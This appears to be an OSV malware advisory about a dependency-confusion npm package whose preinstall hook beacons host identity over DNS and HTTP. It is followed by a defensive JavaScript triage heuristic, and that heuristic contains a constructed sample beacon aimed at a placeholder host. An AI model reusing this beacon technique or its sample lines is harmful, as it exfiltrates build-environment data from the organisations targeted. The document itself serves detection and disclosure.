@nstrlabs/api-client @99.0.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID: MAL-2026-5418
Ecosystem: npm
Summary
@nstrlabs/api-client@99.0.0 is a hollow package whose only behavior is an install-time exfiltration beacon. package.json declares "preinstall": "node index.js || true", so every npm install automatically executes index.js, which collects os.hostname(), os.userInfo().username, __dirname, and process.cwd() and ships them through two independent channels: (1) a DNS lookup against a subdomain of d8jbmnsqcfu78dfs8vdg34ohqhirb4pbg.oast.live (an OAST-style out-of-band callback) that encodes the collected fields in the queried name, and (2) an HTTP POST of the JSON payload to the hardcoded bare IP 172.201.213.59:9090/c. Errors are swallowed with || true so the install still appears to succeed. The package ships no API-client functionality; the version-bomb to 99.0.0 under the @nstrlabs scope, combined with the security research description and the beacon-only payload, is the canonical dependency-confusion shape: designed to outrank a private internal @nstrlabs/api-client and silently identify hosts inside the target organization's build environment.
Source: amazon-inspector (de7b47a7f81209dbbaff286599b46f4f030ff992b6d0c25d947cc84739b838d9)
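The following script is an added example, not part of the OSV record or of Amazon Inspector's analysis. It turns the indicators the summary describes (an install-time lifecycle hook that swallows errors, a node script that reads host identity and reaches the network via DNS or a bare IP, and an implausibly high major version on a scoped package) into a triage heuristic a build pipeline can run over a package's metadata and source before trusting it. Everything is operated on in memory: the sample package.json and index.js below are constructed, the source string is only pattern-matched (never executed), and its endpoints are placeholders (an RFC 5737 documentation IP and a made-up oast hostname), not the advisory's real indicators. The hook list, regular expressions and the version threshold are assumptions to tune per organization.

```javascript
// Added example: heuristic triage of an npm package for the install-time
// beacon shape described in the advisory. No filesystem or network access.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// A bare IPv4 literal, e.g. "203.0.113.10" (optionally with ":port").
const BARE_IP_RE = /\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b/g;
// Any hostname under an "oast.<tld>" domain (out-of-band callback services).
const OAST_HOST_RE = /\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.oast\.[a-z]{2,}\b/gi;
// Code that reaches the network or reads host identity (assumed patterns).
const DNS_RE = /require\(['"]dns['"]\)|\bdns\.(?:lookup|resolve\w*)\(/;
const HTTP_RE = /require\(['"]https?['"]\)|\bhttps?\.(?:request|get)\(/;
const HOST_INFO_RE = /os\.hostname\(\)|os\.userInfo\(\)|process\.cwd\(\)|__dirname/;

// Returns the lifecycle scripts a package would run during `npm install`.
function findLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h] }));
}

// Static indicators in one source file: bare IPs, oast hosts, network and
// host-identity API usage.
function findBeaconIndicators(source) {
  return {
    bareIps: [...new Set(source.match(BARE_IP_RE) || [])],
    oastHosts: [...new Set(source.match(OAST_HOST_RE) || [])],
    usesDns: DNS_RE.test(source),
    usesHttp: HTTP_RE.test(source),
    collectsHostInfo: HOST_INFO_RE.test(source),
  };
}

// Dependency-confusion heuristic: a major version far beyond anything a
// real project would publish. The threshold is an assumption.
function looksLikeVersionBomb(version, threshold = 50) {
  const major = parseInt(String(version).split('.')[0], 10);
  return Number.isInteger(major) && major >= threshold;
}

// Combines the signals: hook + network + host identity => high;
// hook + network => medium; otherwise low. Reasons are kept for the reviewer.
function assessPackage(pkg, sourceFiles) {
  const reasons = [];
  const hooks = findLifecycleScripts(pkg);
  for (const { hook, command } of hooks) {
    reasons.push(`lifecycle hook ${hook}: ${command}`);
    if (/\|\|\s*true\b/.test(command)) reasons.push(`${hook} swallows errors with "|| true"`);
  }
  if (looksLikeVersionBomb(pkg.version)) reasons.push(`suspicious major version ${pkg.version}`);

  let network = false;
  let hostInfo = false;
  for (const [name, src] of Object.entries(sourceFiles)) {
    const ind = findBeaconIndicators(src);
    if (ind.bareIps.length) { network = true; reasons.push(`${name}: bare IP ${ind.bareIps.join(', ')}`); }
    if (ind.oastHosts.length) { network = true; reasons.push(`${name}: oast host ${ind.oastHosts.join(', ')}`); }
    if (ind.usesDns || ind.usesHttp) network = true;
    if (ind.collectsHostInfo) { hostInfo = true; reasons.push(`${name}: reads host identity`); }
  }

  let risk = 'low';
  if (hooks.length && network && hostInfo) risk = 'high';
  else if (hooks.length && network) risk = 'medium';
  return { risk, reasons };
}

// Constructed sample shaped like the advisory's package (placeholder scope).
const SAMPLE_PKG = {
  name: '@example-scope/api-client',
  version: '99.0.0',
  scripts: { preinstall: 'node index.js || true' },
};
// Constructed index.js as a string, only pattern-matched. The IP is an
// RFC 5737 documentation address and the hostname is a placeholder.
const SAMPLE_SOURCES = {
  'index.js': [
    "const os = require('os'); const dns = require('dns'); const http = require('http');",
    "const info = { h: os.hostname(), u: os.userInfo().username, d: __dirname, c: process.cwd() };",
    "dns.lookup(Buffer.from(JSON.stringify(info)).toString('hex') + '.placeholder.oast.example', () => {});",
    "const req = http.request({ host: '203.0.113.10', port: 9090, path: '/c', method: 'POST' });",
    'req.end(JSON.stringify(info));',
  ].join('\n'),
};
// Constructed benign counterpart: no lifecycle hook, normal version, no beacon.
const BENIGN_PKG = { name: '@example-scope/api-client', version: '1.4.2', scripts: { test: 'node test.js' } };
const BENIGN_SOURCES = {
  'index.js': "module.exports = { get: (path) => fetch('https://api.example.com' + path) };",
};

console.log(JSON.stringify(assessPackage(SAMPLE_PKG, SAMPLE_SOURCES), null, 2));
console.log(JSON.stringify(assessPackage(BENIGN_PKG, BENIGN_SOURCES), null, 2));
```

In a real pipeline the same functions would be fed each entry of the lockfile after `npm pack` (or a registry tarball fetched without running scripts, e.g. `npm install --ignore-scripts`), and a "high" result would block the merge rather than just log. The benign sample shows the point of combining signals: an HTTPS API client on its own is not flagged, only the conjunction of an install hook, network egress and host-identity collection is.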